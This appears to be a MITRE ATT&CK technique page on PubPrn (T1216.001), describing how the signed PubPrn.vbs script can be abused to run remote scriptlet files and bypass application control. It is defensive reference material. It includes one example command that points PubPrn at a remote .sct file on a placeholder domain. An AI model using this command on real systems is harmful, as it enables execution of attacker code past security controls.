Skip to content

Hide Navigation Hide TOC

PubPrn - T1216.001 (09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58)

Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)

Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.

In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).

Cluster A Galaxy A Cluster B Galaxy B Level
System Script Proxy Execution - T1216 (f6fe9070-7a65-49ea-ae72-76292f42cebe) Attack Pattern PubPrn - T1216.001 (09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58) Attack Pattern 1